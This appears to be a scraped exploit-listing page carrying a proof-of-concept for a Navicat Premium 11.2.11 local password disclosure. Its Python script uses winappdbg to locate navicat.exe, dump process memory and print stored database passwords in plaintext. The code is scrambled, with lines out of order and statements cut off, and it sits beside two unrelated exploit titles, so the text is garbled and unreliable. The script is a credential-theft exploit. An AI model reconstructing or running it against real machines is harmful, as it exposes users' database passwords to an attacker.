"Ksix Zigbee Devices - Playback Protection Bypass (PoC)" "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" split ( "00 " ) if last : count = count + 1 found = 1 print " Password for connection # %d found as %s " % ( count, h2b ( last )) if found = 0 : print " Password not found! Make sure the client is connected at least to one database." else : print " No process found with name ' %s '." % ( filename ) debug. pop ( 0 ) for i in range ( len ( memory_dump )): str = b2h ( memory_dump ) first = str. sleep ( 1 ) print " Trying to read memory for pid # %d " % ( process_pid ) process = Process ( process_pid ) for address in process. get_pid () if process_pid is not 0 : print " Found process with pid # %d " % ( process_pid ) time. find_processes_by_filename ( filename ): process_pid = process. scan_processes () for ( process, process_name ) in debug. ![]() join ( bytes ) debug = Debug () try : print " Searching for pid by process name ' %s '." % ( filename ) time. append ( chr ( int ( str, 16 ))) return ''. split ( " " )) for i in range ( 0, len ( str ), 2 ): bytes. strip () def h2b ( str ): bytes = str = ''. # Proof-Of-Concept Code: # import time from winappdbg import Debug, Process count = 0 found = 0 filename = "navicat.exe" process_pid = 0 memory_dump = def b2h ( str ): return ''. # A potential attacker could reveal the supplied password in order to gain access to the database. ![]() # Navicat Premium 11.2.11 (64bit) Local Password Disclosure # Tested on Windows Windows Server 2012 R2 64bit, English # Vendor Homepage # Date # Bug Discovered by Yakir Wizman () # Special Thanks & Greetings to friend of mine Viktor Minin () | () # Navicat Premium client v11.2.11 is vulnerable to local password disclosure, the supplied password is stored in a plaintext format in memory process.
0 Comments
Leave a Reply. |